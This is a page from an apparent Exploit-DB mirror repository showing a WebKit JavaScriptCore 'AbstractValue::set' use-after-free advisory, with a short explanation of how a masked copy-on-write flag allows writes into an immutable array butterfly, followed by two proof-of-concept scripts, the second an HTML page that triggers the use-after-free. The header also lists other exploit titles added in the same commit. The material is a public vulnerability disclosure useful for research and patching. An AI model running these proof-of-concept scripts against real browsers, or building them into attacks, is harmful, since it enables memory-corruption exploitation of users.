bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/dos/46071.html
Offensive Security e8dcb9f022 DB: 2019-01-03 
12 changes to exploits/shellcodes

EZ CD Audio Converter 8.0.7 - Denial of Service (PoC)
NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)
NBMonitor Network Bandwidth Monitor 1.6.5.0 - 'Name' Denial of Service (PoC)
WebKit JSC - 'AbstractValue::set' Use-After-Free
WebKit JSC - 'JSArray::shiftCountWithArrayStorage' Out-of-Bounds Read/Write

Ayukov NFTP FTP Client 2.0 - Buffer Overflow
Hashicorp Consul - Remote Command Execution via Rexec (Metasploit)
Hashicorp Consul - Remote Command Execution via Services API (Metasploit)
WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection
Frog CMS 0.9.5 - Cross-Site Scripting
ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts)
WSTMart 2.0.8 - Cross-Site Scripting
ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts)
WSTMart 2.0.8 - Cross-Site Scripting

FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection

Craft CMS 3.0.25 - Cross-Site Scripting
bludit Pages Editor 3.0.0 - Arbitrary File Upload
WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload
bludit Pages Editor 3.0.0 - Arbitrary File Upload
WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload
Vtiger CRM 7.1.0 - Remote Code Execution
2019-01-03 05:01:43 +00:00

106 lines
No EOL
2.4 KiB
HTML
Raw Blame History

<!--
void AbstractValue::set(Graph& graph, RegisteredStructure structure)
{
RELEASE_ASSERT(structure);
m_structure = structure;
m_arrayModes = asArrayModes(structure->indexingType());
m_type = speculationFromStructure(structure.get());
m_value = JSValue();
checkConsistency();
assertIsRegistered(graph);
}
It works out m_arrayModes using structure->indexingType() instead of structure->indexingMode(). As structure->indexingType() masks out the CopyOnWrite flag, which indicates that the butterfly of the array is immutable, needing copy-on-write, the wrong information about the array can be propagated. As a result, it's able to write into the immutable butterfly (JSImmutableButterfly) of a CoW array. And this can lead to UaF as
writing into an immutable butterfly can be used to bypass write barriers.
I also noticed that the most calls to asArrayModes are using structure->indexingType(). I think that those should be fixed too.
PoC:
-->
// ./jsc --useConcurrentJIT=false ~/test.js
function set(arr, value) {
arr[0] = value;
}
function getImmutableArrayOrSet(get, value) {
let arr = [1];
if (get)
return arr;
set(arr, value); // This inlinee is for having checkArray not take the paths using the structure comparison.
set({}, 1);
}
function main() {
getImmutableArrayOrSet(true);
for (let i = 0; i < 100; i++) {
getImmutableArrayOrSet(false, {});
}
let arr = getImmutableArrayOrSet(true);
print(arr[0] === 1);
}
main();
PoC 2 (UaF):
<script>
function sleep(ms) {
let s = new Date();
while (new Date() - s < ms) {
}
}
function mark() {
for (let i = 0; i < 40; i++) {
new ArrayBuffer(1024 * 1024 * 1);
}
}
function set(arr, value) {
arr[0] = value;
}
function getImmutableArrayOrSet(get, value) {
let arr = [1];
if (get)
return arr;
set(arr, value);
set({}, 1);
}
function main() {
getImmutableArrayOrSet(true);
for (let i = 0; i < 10000; i++)
getImmutableArrayOrSet(false, {});
sleep(500);
let arr = getImmutableArrayOrSet(true);
mark();
getImmutableArrayOrSet(false, []);
mark();
setTimeout(() => {
try {
alert(arr[0]);
} catch (e) {
alert(e);
}
}, 200);
}
main();
</script>
Reference in a new issue View git blame Copy permalink